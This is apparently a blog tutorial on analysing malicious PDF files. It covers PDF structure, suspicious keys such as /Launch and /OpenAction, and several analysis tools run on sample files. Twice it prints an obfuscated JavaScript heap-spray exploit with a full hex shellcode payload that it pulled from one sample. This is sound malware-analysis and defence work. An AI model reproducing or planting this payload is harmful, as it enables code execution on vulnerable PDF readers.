Analyzing Malicious PDF

PDF files are very commonly used to share documents, and due to several vulnerabilities reported in PDF reading software, as I quietly put it, it is commonly used by unethical hackers for Client Side attacks.

The point to note is that the PDF, containing malware, needs a vulnerable software, for a successful exploit.

Quickly going through the structure of a PDF file:-

  • header - contains version number of the PDF file.
  • body - contains objects like streams/images/media ..etc, basically document data in chunks distinguished by content and data type.
  • xref - cross reference table which provides details of the location of objects from the beginning(called offset).
  • trailer - provides information on how the PDF reading software should read the file. All pdf readers start reading a pdf file, from trailer section. It also provides the offset location of xref, with the variable startxref.

Incremental updates can be made to a pdf file, while adding new contents or when adding signature. In such a case, new body + xref + trailer is appended to the existing file. New trailer keeps the information of the main xref table.

Some PDF data types:-

  • Boolean - true/false
  • Numbers - integer with a suffix +/- , eg. 12+
  • Names - starts with '/', eg /Danny
  • Strings - series of bytes surrounded by parenthesis (data) or angle brackets . Data can contain ASCII/hexadecimal/octal. Octal data prefixes with ''.
  • Arrays - sequence of objects enclosed within '[' and ']'
  • Dictionaries - contains key value pair, where key can be name of the object and value can be the object, enclosed with << and >>
  • Streams - sequence of bytes usually for images and other big data blocks, enclosed within 'stream' and 'endstream'. Stream is accompanied with stream dictionary, which contains details on the streams.

Note:-

  • /Filter - says the object content is encoded using the mentioned algorithm
  • /JS 110 0 R - implies run javascript at object id 110. R for reference.

More at PDF File Format, Adobe

Without going into too much details, I will delve into real deal.

Attack Vectors

What to typically look out for, in a malicious pdf file?

  • Javascript code, usually obfuscated
  • Shell code, usually hexadecimal
  • Launching an application in the background
  • Downloading malware from url and running it
  • Embedded flash running Action Script

Where to look?

  • Launch Action
/Type /Action 
/S /Launch
<</F(cmd.exe)>>
  • Javascript /JS or /JavaScript
  • /OpenAction /AA tells to automatically run a script
  • /Names or /Acroform or /Action can launch script/action too
  • /GoTo - changes view to another pdf file outside or within the file
  • /URI - call a url
  • /SubmitForm and /GoToR can send data to URL
  • /RichMedia can imply presence of flash file
  • /ObjStm - objects can be hidden here

Is this comprehensive? Nope! Malicious code could be hidden anywhere.

Here are some tools to make life easy.

AnalyzePDF

No brainer, just point file and shoot.

$  AnalyzePDF.py  malware1.pdf 

===================================
[+] Analyzing: malware1.pdf
-----------------------------------
[-] Sha256: 27cced58a0fcbb0bbe3894f74d3014611039fefdf3bd2b0ba7ad85b18194cffa
[-] JavaScript count.......: 2
	[*] That's a lot of js ...
[-] AcroForm...............: 2
[-] Total Entropy..........: 2.040198
[-] Entropy inside streams : 1.737587
[-] Entropy outside streams: 5.179112
	[*] Entropy of outside stream is questionable:
	[-] Outside (5.179112) +2 (7.179112) > Total (2.040198)
	[*] LOW entropy detected:
	[-] Total (2.0) or Inside (1.7) <= 2.0
[-] YARA hit(s): [embedded_exe]
-----------------------------------
[-] Total YARA score.......: 0
[-] Total severity score...: 3
[-] Overall score..........: 3
===================================
[!] MEDIUM probability of being malicious

 $  AnalyzePDF.py  malware3.pdf 

===================================
[+] Analyzing: malware3.pdf
-----------------------------------
[-] Sha256: bd2776e507cf0284a9cfb7deb9a241d6699243a221c125f9911fa753ca8f01d1
[-] Total Entropy..........: 7.982258
[-] Entropy inside streams : 7.983942
[-] Entropy outside streams: 5.399691
[-] (1) page PDF
-----------------------------------
[-] Total YARA score.......: 0
[-] Total severity score...: 0
[-] Overall score..........: 0
===================================
[-] Scanning didn't determine anything warranting suspicion

malware1.pdf is shown to have 2 javascripts and 2 acroforms, and probability of being malicious set to medium.
But malware2.pdf did not raise any suspicion. Lets take a deeper look at the file.

pdfid and pdf-parser

pdfid provides with a summary of all objects in the file. pdf-parser can then be used to take a look at each object.

 $  pdfid.py   malware3.pdf   
PDFiD 0.2.1 malware3.pdf
 PDF Header: %PDF-1.7
 obj                   17
 endobj                17
 stream                14
 endstream             14
 xref                   0
 trailer                0
 startxref              2
 /Page                  1
 /Encrypt               0
 /ObjStm                3
 /JS                    0
 /JavaScript            0
 /AA                    0
 /OpenAction            0
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Launch                0
 /EmbeddedFile          0
 /XFA                   0
 /Colors > 2^24         0

Lets take a look at the objects, starting with ObjStms

$  pdf-parser.py  --search  objstm   malware3.pdf  
obj 15 0
 Type: /ObjStm
 Referencing: 
 Contains stream

  <<
    /Filter /FlateDecode
    /First 99
    /Length 511
    /N 15
    /Type /ObjStm
  >>


obj 3 0
 Type: /ObjStm
 Referencing: 
 Contains stream

  <<
    /Filter /FlateDecode
    /First 4
    /Length 49
    /N 1
    /Type /ObjStm
  >>


obj 4 0
 Type: /ObjStm
 Referencing: 
 Contains stream

  <<
    /Filter /FlateDecode
    /First 4
    /Length 125
    /N 1
    /Type /ObjStm
  >>

There are 3 objects with id 15, 3 and 4. We can look into each object by the following:-


 $  pdf-parser.py -o  15 -wf   malware3.pdf  
obj 15 0
 Type: /ObjStm
 Referencing: 
 Contains stream

  <<
    /Filter /FlateDecode
    /First 99
    /Length 511
    /N 15
    /Type /ObjStm
  >>

 19 0 20 22 21 44 22 71 23 79 24 512 25 545 26 585 27 620 28 628 29 659 30 715 31 734 32 745 33 781 <</JavaScript 20 0 R>><</Names[(tt)21 0 R]>><</JS 10 0 R/S/JavaScript>>[23 0 R]<</AP<</N 12 0 R>>/BS<</S/S/Type/Border/W 0>>/Border[0 0 0]/F 68/NM(RM1)/P 11 0 R/Rect[60.307 50.5217 61.307 51.5217]/RichMediaContent 25 0 R/RichMediaSettings<</Activation<</Condition/PV/Configuration 26 0 R/Presentation<</NavigationPane false/PassContextClick false/Style/Embedded/Toolbar false/Transparent false>>/Type/RichMediaActivation>>/Deactivation<</Condition/XD/Type/RichMediaDeactivation>>>>/Subtype/RichMedia/Type/Annot>><</CA 1.0/Type/ExtGState/ca 1.0>><</Assets 32 0 R/Configurations 33 0 R>><</Instances 27 0 R/Subtype/Flash>>[28 0 R]<</Asset 29 0 R/Params 30 0 R>><</EF<</F 1 0 R>>/F(pad.swf)/Type/Filespec/UF(pad.swf)>><</Binding 31 0 R>>/Background<</Names[(pad.swf)29 0 R]>>[26 0 R]

Interesting objects are 20, 21, 10, 23, 12. Also, note the embedded flash file.

...
 $  pdf-parser.py -o  10  -wf   malware3.pdf  
obj 10 0
 Type: 
 Referencing: 
 Contains stream

  <<
    /Filter [/FlateDecode]
    /Length 1101
  >>

 var p = unescape;
var len = "\x6c\x65\x6e\x67\x74\x68";
function a(__){var _='';for(var ___=0;___<__[len];___+=4) _+='%'+'u'+__.substr(___,4);return _;}
var sb="uismhtsmfvotro,[svystr,ptpmd";
function s()
{
c = p(a("0c0c0c0c"));
while(c[len] + 20 + 8 < 0x10000) c = c + c;
b = c["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,(0x0c0c-0x24)/2);
b += p(a("0c0c0c0c49190700cccccccc48ef0700156f0700cccccccc90840700908407009084070090840700908407009084070090330700908407000c0c0c0c9084070090840700908407009084070090840700908407009084070090840700159907000124000172f707000104000115bb070010000000154d070015bb070003007ffe7fb2070015bb070000110001a8ac070015bb070001000001a8ac070072f707000011000152e207005c540700ffffffff0100000100000000010400011000000000400000d731070015bb0700905a9054154d0700a722070015bb0700eb5a5815154d0700a722070015bb07001a8b1889154d0700a722070015bb0700c0838304154d0700a722070015bb070004c2fb81154d0700a722070015bb07000c0c0c0c154d0700a722070015bb0700ee7505eb154d0700a722070015bb0700e6e8ffff154d0700a722070015bb070090ff9090154d0700a722070015bb070090909090154d0700a722070015bb070090909090154d0700a722070015bb0700ffff90ff154d0700d7310700112f0700a16400300000408b8b0c1c708bad087034e900025800ec8102000000fc8b77898908104777ff680897ec0c03c4e8000189001c4777ff680822f67cb9b4e800018900204777ff680817a57c00a4e800018900244777ff680897fb0ffd94e800018900284777ff6808651610fa84e8000189002c4777ff6808791fe80a74e800018900304777ff6808b025c2ff64e800018900344777ff680808ac76da54e800018900384777ff6808fe980e8a44e8000189003c4777ff6808897499ec34e800018900404777ff6808b98378b524e800018900444777ff68089baddf7d14e800018900484777ffff103457f6338d466047565057ff8348fff8f274003d0010760089eb04477789ff600477406a57ff891c5c47006a006a006a77ffff603857f88374ff6a4b8d00705fff53047777ffff5c607757ff8b2c704fe9838b105c47814046385a2e756881090478062319810474ece21aebc0838908144781404a386375754b81090478011219830e74ece277ffff5c2057850fff72ffffc08389081847006a806800006a006a026a0068000000400077ffff1024574789c7646c475a4d0090006a5f8d5370046a5f8d536c77ffff643057478b2b181447e8838b08145f03304843f88375006af78d00705f8b53185f5f2b831408ebff53147777ffff64305777ffff642857006a77ffff103c5766eb90905590ec8b8b57087d5d8b560c738b8b3c1e74037856f3768b032033f349c9ad41c30333560ff610bef23a0874cec1030d40f2f1ebfe3b755e5ae5eb8b5a8b032466dd0c8b8b4b1c5add03048b038b5ec55d5f08c2e800fdc7ffff3a632d5c652e65789000006aff6a57ff9044"));
b += c;
d = b["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,0x10000/2);
while(d[len] < 0x80000) d+=d;
_3 = d["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,0x80000-(0x1020-0x08)/2);
_4 = new Array();
for(i=0;i<0x1f0;i=i+1) _4[i] = _3 + "s";
}
s();


Hurray! we got the suspicious payload. This appears to be a shellcode.

Extracting flash file off the pdf, using swf_mastah.py and look for Action Scripts, using flare.

 $  swf_mastah.py -o swf3  -f  malware3.pdf 
 $ 
 $  flare  swf31_decoded_object.swf
 $
 $  cat swf31_decoded_object.flr 
movie 'swf31_decoded_object.swf' {
// flash 9, total frames: 1, frame rate: 31 fps, 550x180 px, compressed
  
  // unknown tag 86 length 11

  movieClip 3  {
  }

  movieClip 4  {
  ...

Nothing further here.

pdfxray_lite

Gives a good overview of the pdf file, reporting in html file, with all objects details.

 $  pdfxray_lite.py  -r report3_ -f malware3.pdf  
721601bdbec57cb103a9717eeef0bfca
 $  firefox report3_721601bdbec57cb103a9717eeef0bfca_report.html

HTML report

jsunpack-n

A tool which can extract javascript and shellcode from a file, sniffing network, pcap file, url call.

 $  ./jsunpackn.py   malware3.pdf   
[malicious:7] [PDF] malware3.pdf
	suspicious: Warning detected //warning CVE-NO-MATCH Shellcode NOP len 65527 //warning CVE-NO-MATCH Shellcode NOP len 67045 //warning CVE-NO-MATCH Shellcode NOP len 516197 //warning CVE-NO-MATCH Shellcode NOP len 514140 //warning CVE-NO-MATCH Shellcode NOP len 9482
	malicious: shellcode of length 991/67562
	malicious: shellcode of length 1357/524288
	malicious: shellcode of length 1356/522228
	malicious: shellcode of length 993/259026079
	file: decoding_e23548afdb2fe9c5e123033df92883614d1bbbd9: 4122 bytes
	file: decoding_f2cb524f74328b57eb7d831e12ddb3c1dbd3a1e3: 98824 bytes
	file: shellcode_4bad40f2f45867b0875d8ab1ed4ef422c2b10c67: 991 bytes
	file: shellcode_7c0cac691d5453f6ee5412b4229c71f2f8bfdceb: 1357 bytes
	file: shellcode_f7e8dbe54d1d158a41344a40ffaf4cd54b2c6423: 1356 bytes
	file: shellcode_b72262be25c5dc1c1ad6b886bd5a40940c8c76b0: 993 bytes
	file: original_11d2f8d754f3e52893c631f0201b72c909d52cd8: 268333 bytes

$ ls temp/files
...  

peepdf

Probably the best tool which has everything, well mostly, for assessing a pdf file.

 $  peepdf.py    -f malware3.pdf    
File: malware3.pdf
MD5: 721601bdbec57cb103a9717eeef0bfca
SHA1: 11d2f8d754f3e52893c631f0201b72c909d52cd8
Size: 268333 bytes
Version: 1.7
Binary: True
Linearized: True
Encrypted: False
Updates: 1
Objects: 34
Streams: 14
Comments: 0
Errors: 0

Version 0:
	Catalog: 9
	Info: 7
	Objects (2): [8, 18]
	Streams (1): [18]
		Xref streams (1): [18]
		Encoded (1): [18]

Version 1:
	Catalog: 9
	Info: 7
	Objects (32): [1, 2, 3, 4, 5, 6, 7, 9, 10, 11, 12, 13, 14, 15, 16, 17, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34]
	Compressed objects (17): [32, 33, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 6, 7]
		Errors (1): [17]
	Streams (13): [34, 10, 12, 13, 14, 15, 16, 17, 1, 2, 3, 4, 5]
		Xref streams (1): [5]
		Object streams (3): [15, 3, 4]
		Encoded (9): [34, 10, 12, 13, 15, 17, 3, 4, 5]
		Decoding errors (1): [17]
	Objects with JS code (1): [10]
	Suspicious elements:
		/Names: [9, 32, 20]
		/JS: [15, 21]
		/JavaScript: [15, 19, 21]



One can start with suspicious elements, and then look at interesting object, using interactive mode.

 $  peepdf.py  -i    -f malware3.pdf    
File: malware3.pdf

...

PPDF> object   10  

<< /Length 1101
/Filter [ /FlateDecode ] >>
stream
var p = unescape;
var len = "\x6c\x65\x6e\x67\x74\x68";
function a(__){var _='';for(var ___=0;___<__[len];___+=4) _+='%'+'u'+__.substr(___,4);return _;}
var sb="uismhtsmfvotro,[svystr,ptpmd";
function s()
{
c = p(a("0c0c0c0c"));
while(c[len] + 20 + 8 < 0x10000) c = c + c;
b = c["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,(0x0c0c-0x24)/2);
b += p(a("0c0c0c0c49190700cccccccc48ef0700156f0700cccccccc90840700908407009084070090840700908407009084070090330700908407000c0c0c0c9084070090840700908407009084070090840700908407009084070090840700159907000124000172f707000104000115bb070010000000154d070015bb070003007ffe7fb2070015bb070000110001a8ac070015bb070001000001a8ac070072f707000011000152e207005c540700ffffffff0100000100000000010400011000000000400000d731070015bb0700905a9054154d0700a722070015bb0700eb5a5815154d0700a722070015bb07001a8b1889154d0700a722070015bb0700c0838304154d0700a722070015bb070004c2fb81154d0700a722070015bb07000c0c0c0c154d0700a722070015bb0700ee7505eb154d0700a722070015bb0700e6e8ffff154d0700a722070015bb070090ff9090154d0700a722070015bb070090909090154d0700a722070015bb070090909090154d0700a722070015bb0700ffff90ff154d0700d7310700112f0700a16400300000408b8b0c1c708bad087034e900025800ec8102000000fc8b77898908104777ff680897ec0c03c4e8000189001c4777ff680822f67cb9b4e800018900204777ff680817a57c00a4e800018900244777ff680897fb0ffd94e800018900284777ff6808651610fa84e8000189002c4777ff6808791fe80a74e800018900304777ff6808b025c2ff64e800018900344777ff680808ac76da54e800018900384777ff6808fe980e8a44e8000189003c4777ff6808897499ec34e800018900404777ff6808b98378b524e800018900444777ff68089baddf7d14e800018900484777ffff103457f6338d466047565057ff8348fff8f274003d0010760089eb04477789ff600477406a57ff891c5c47006a006a006a77ffff603857f88374ff6a4b8d00705fff53047777ffff5c607757ff8b2c704fe9838b105c47814046385a2e756881090478062319810474ece21aebc0838908144781404a386375754b81090478011219830e74ece277ffff5c2057850fff72ffffc08389081847006a806800006a006a026a0068000000400077ffff1024574789c7646c475a4d0090006a5f8d5370046a5f8d536c77ffff643057478b2b181447e8838b08145f03304843f88375006af78d00705f8b53185f5f2b831408ebff53147777ffff64305777ffff642857006a77ffff103c5766eb90905590ec8b8b57087d5d8b560c738b8b3c1e74037856f3768b032033f349c9ad41c30333560ff610bef23a0874cec1030d40f2f1ebfe3b755e5ae5eb8b5a8b032466dd0c8b8b4b1c5add03048b038b5ec55d5f08c2e800fdc7ffff3a632d5c652e65789000006aff6a57ff9044"));
b += c;
d = b["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,0x10000/2);
while(d[len] < 0x80000) d+=d;
_3 = d["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,0x80000-(0x1020-0x08)/2);
_4 = new Array();
for(i=0;i<0x1f0;i=i+1) _4[i] = _3 + "s";
}
s();
endstream


PPDF> js_code 10 

var p = unescape;
var len = "length";

function a(__) {
    var _ = '';
    for (var ___ = 0; ___ < __[len]; ___ += 4) _ += '%' + 'u' + __.substr(___, 4);
    return _;
}
var sb = "uismhtsmfvotro,[svystr,ptpmd";

function s() {
    c = p(a("0c0c0c0c"));
    while (c[len] + 20 + 8 < 0x10000) c = c + c;
    b = c["substring"](0, (0x0c0c - 0x24) / 2);
    b += p(a("0c0c0c0c49190700cccccccc48ef0700156f0700cccccccc90840700908407009084070090840700908407009084070090330700908407000c0c0c0c9084070090840700908407009084070090840700908407009084070090840700159907000124000172f707000104000115bb070010000000154d070015bb070003007ffe7fb2070015bb070000110001a8ac070015bb070001000001a8ac070072f707000011000152e207005c540700ffffffff0100000100000000010400011000000000400000d731070015bb0700905a9054154d0700a722070015bb0700eb5a5815154d0700a722070015bb07001a8b1889154d0700a722070015bb0700c0838304154d0700a722070015bb070004c2fb81154d0700a722070015bb07000c0c0c0c154d0700a722070015bb0700ee7505eb154d0700a722070015bb0700e6e8ffff154d0700a722070015bb070090ff9090154d0700a722070015bb070090909090154d0700a722070015bb070090909090154d0700a722070015bb0700ffff90ff154d0700d7310700112f0700a16400300000408b8b0c1c708bad087034e900025800ec8102000000fc8b77898908104777ff680897ec0c03c4e8000189001c4777ff680822f67cb9b4e800018900204777ff680817a57c00a4e800018900244777ff680897fb0ffd94e800018900284777ff6808651610fa84e8000189002c4777ff6808791fe80a74e800018900304777ff6808b025c2ff64e800018900344777ff680808ac76da54e800018900384777ff6808fe980e8a44e8000189003c4777ff6808897499ec34e800018900404777ff6808b98378b524e800018900444777ff68089baddf7d14e800018900484777ffff103457f6338d466047565057ff8348fff8f274003d0010760089eb04477789ff600477406a57ff891c5c47006a006a006a77ffff603857f88374ff6a4b8d00705fff53047777ffff5c607757ff8b2c704fe9838b105c47814046385a2e756881090478062319810474ece21aebc0838908144781404a386375754b81090478011219830e74ece277ffff5c2057850fff72ffffc08389081847006a806800006a006a026a0068000000400077ffff1024574789c7646c475a4d0090006a5f8d5370046a5f8d536c77ffff643057478b2b181447e8838b08145f03304843f88375006af78d00705f8b53185f5f2b831408ebff53147777ffff64305777ffff642857006a77ffff103c5766eb90905590ec8b8b57087d5d8b560c738b8b3c1e74037856f3768b032033f349c9ad41c30333560ff610bef23a0874cec1030d40f2f1ebfe3b755e5ae5eb8b5a8b032466dd0c8b8b4b1c5add03048b038b5ec55d5f08c2e800fdc7ffff3a632d5c652e65789000006aff6a57ff9044"));
    b += c;
    d = b["substring"](0, 0x10000 / 2);
    while (d[len] < 0x80000) d += d;
    _3 = d["substring"](0, 0x80000 - (0x1020 - 0x08) / 2);
    _4 = new Array();
    for (i = 0; i < 0x1f0; i = i + 1) _4[i] = _3 + "s";
}
s();


Some quick commands:-

info  - gives overview 
object <objectid> - dumps data decoded if encoded
rawobject <objectid> - raw data, as is
js_code <objectid> - show javascript readable code 

Origami

Provides with ruby library for working with pdf files. Read the online ruby document for further details.

I encountered this little bug, while fiddling with pdfsh (which uses origami) on remnux.

$ pdfsh  
load error: /var/lib/gems/1.9.1/gems/origami-1.2.7/bin/shell/.irbrc
NameError: uninitialized constant Ref::SoftReference::Monitor
	/var/lib/gems/1.9.1/gems/ref-2.0.0/lib/ref/soft_reference.rb:26:in `<class:SoftReference>'
	/var/lib/gems/1.9.1/gems/ref-2.0.0/lib/ref/soft_reference.rb:19:in `<module:Ref>'
	/var/lib/gems/1.9.1/gems/ref-2.0.0/lib/ref/soft_reference.rb:1:in `<top (required)>'

The fix is a simple line require 'monitor'

/var/lib/gems/1.9.1/gems/ref-2.0.0/lib/ref/soft_reference.rb
...
 24     MIN_GC_CYCLES = 10
 25     require 'monitor'
 26     @@lock = Monitor.new
...

Defence

  • Keep your PDF reading software updated
  • Avoid reading PDFs on browser or disable javascript
  • Do not allow execution of external applications from PDF

References

Dinesh Gunasekar - | Tags : PDF, JavaScript, ShellCode
comments powered by Disqus